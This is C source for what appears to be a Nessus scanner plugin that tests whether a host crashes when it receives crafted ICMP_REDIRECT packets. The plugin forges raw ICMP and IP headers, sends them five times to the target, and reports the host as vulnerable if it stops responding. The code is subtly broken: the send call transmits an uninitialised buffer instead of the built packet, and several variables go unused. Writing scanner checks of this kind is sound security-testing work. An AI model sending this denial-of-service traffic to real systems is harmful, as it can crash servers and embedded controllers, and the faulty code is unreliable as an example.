/*
 * 
 * This plugin is (c) Renaud Deraison and is licensed under the GPL
 * 
 * The biggest part of this plugin has been cut'n'pasted from the hostloop library,
 * which happens to be written by me
 *
 */
 
#include <includes.h>
#include <nessusraw.h>

#define NAME "icmp redirect"
#define DESCRIPTION "\
This plugin performs an ICMP_REDIRECT request.\n\
This kind of request may make some old servers and\n\
some operating systems used in intelligent embedded\n\
controllers crash.\n\
Risk factor : High"

#define COPYRIGHT "licensed under the GPL"
#define SUMMARY "sends an ICMP_REDIRECT request"

#ifndef ICMP_REDIRECT
#define ICMP_REDIRECT 5
#endif


#ifndef ICMP_ECHO
#define ICMP_ECHO 8
#endif

void icmp_redirect(struct arglist *  env);
int ping(struct arglist * env);

PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
  plug_set_name(desc, NAME);
  plug_set_description(desc, DESCRIPTION);
  plug_set_summary(desc, SUMMARY);
  plug_set_copyright(desc, COPYRIGHT);
  plug_set_category(desc, ACT_DENIAL);
  plug_set_family(desc, "Denial of Service");
  return(0);
}


PlugExport int plugin_run(struct arglist * env);
PlugExport int plugin_run(struct arglist * env)
{
 struct in_addr * addr = plug_get_host_ip(env);
 if(tcp_ping_host(*addr))
 {
  icmp_redirect(env);
  if(!tcp_ping_host(*addr))
  
    proto_post_hole(env, 0, "icmp", "\
The remote host crashed after having been sent\n\
an ICMP_REDIRECT request. \n\
Solution: contact your vendor for a fix");
   }
}

/*
 * Checksum routine for Internet Protocol family headers (C Version)
 * From ping examples in W.Richard Stevens "UNIX NETWORK PROGRAMMING" book.
 */
int in_cksum(p,n)
u_short *p; int n;
{
  register u_short answer;
  register long sum = 0;
  u_short odd_byte = 0;

  while( n > 1 )  { sum += *p++; n -= 2; }

  /* mop up an odd byte, if necessary */
  if( n == 1 ) {
      *(u_char *)(&odd_byte) = *(u_char *)p;
      sum += odd_byte;
  }

  sum = (sum >> 16) + (sum & 0xffff);	/* add hi 16 to low 16 */
  sum += (sum >> 16);			/* add carry */
  answer = (int)~sum;			/* ones-complement, truncate*/
  return (answer);
}

void icmp_redirect(struct arglist * env)
{
 int soc;
 struct in_addr addr, *p_addr;
 char * buf;
 struct ip *ip;
 struct icmp *icmp;
 struct protoent * ip_proto;
 int len;
 struct timeval tv = {0,0};
 struct sockaddr_in saddr;
 unsigned char * c_addr;
 int count = 5;
 int ok = 0;
 char * a, * b = NULL;
 bzero(&saddr, sizeof(struct sockaddr_in));
 p_addr = plug_get_host_ip(env);
 addr = *p_addr;
 c_addr = (unsigned char *)&(addr.s_addr);
 ip_proto = getprotobyname("icmp");
 if(!ip_proto)return;
  
 soc = socket(AF_INET, SOCK_RAW, ip_proto->p_proto);
 if(soc < 0 )return;
 icmp = emalloc(100); 
  icmp->icmp_type = ICMP_REDIRECT;
  icmp->icmp_code = 1;
  icmp->icmp_cksum = 0;
  icmp->icmp_seq = 1;
  icmp->icmp_id = getpid() & 0xFFFF;
  icmp->icmp_gwaddr.s_addr = addr.s_addr;
  icmp->icmp_ip.ip_src.s_addr = addr.s_addr;
  icmp->icmp_ip.ip_v = 4; 
  icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
  icmp->icmp_ip.ip_len = htons(100);
  icmp->icmp_ip.ip_id = htons(3722);
  icmp->icmp_ip.ip_off = 0;
  icmp->icmp_ip.ip_ttl = 254;
  icmp->icmp_ip.ip_p = 1;
  icmp->icmp_ip.ip_sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof *ip);
  
  len = 100;
  saddr.sin_family = AF_INET;
  saddr.sin_addr = addr;
  saddr.sin_port = 0;
  icmp->icmp_cksum = in_cksum((u_short *)icmp,len);
  while(count--)
 sendto(soc, buf, len, 0, (struct sockaddr *)(&saddr), sizeof(struct sockaddr_in));
  free(icmp);
  shutdown(soc, 2);
  close(soc);
}
  
  
